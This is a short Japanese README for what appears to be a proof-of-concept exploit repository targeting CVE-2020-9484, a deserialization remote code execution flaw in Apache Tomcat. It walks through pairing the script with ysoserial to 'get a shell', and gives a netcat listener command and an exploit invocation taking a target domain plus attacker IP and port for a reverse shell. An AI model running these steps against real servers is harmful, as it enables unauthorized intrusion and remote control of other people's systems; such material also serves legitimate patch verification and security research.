
CVE-2020-9484 のPOC
CVE-2020-9484 の POC
Apache Tomcat のデシリアライゼーションによる RCE (CVE-2020-9484)
ドキュメントを見る »
1. このリポジトリをクローンすると、CVE-2020-9484 を使用でき、必要に応じてソースコードを変更できます。
2. ysoserial jar をダウンロードします。
3. CVE-2020-9484 と ysoserial.jar の両方を同じディレクトリに置きます。
4. シェルを取得します!
CVE-2020-9484 の使用を効率化するために、シンプルな bash スクリプトが作成されています。
悪用時には、netcat リスナーを準備しておく必要があります。
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
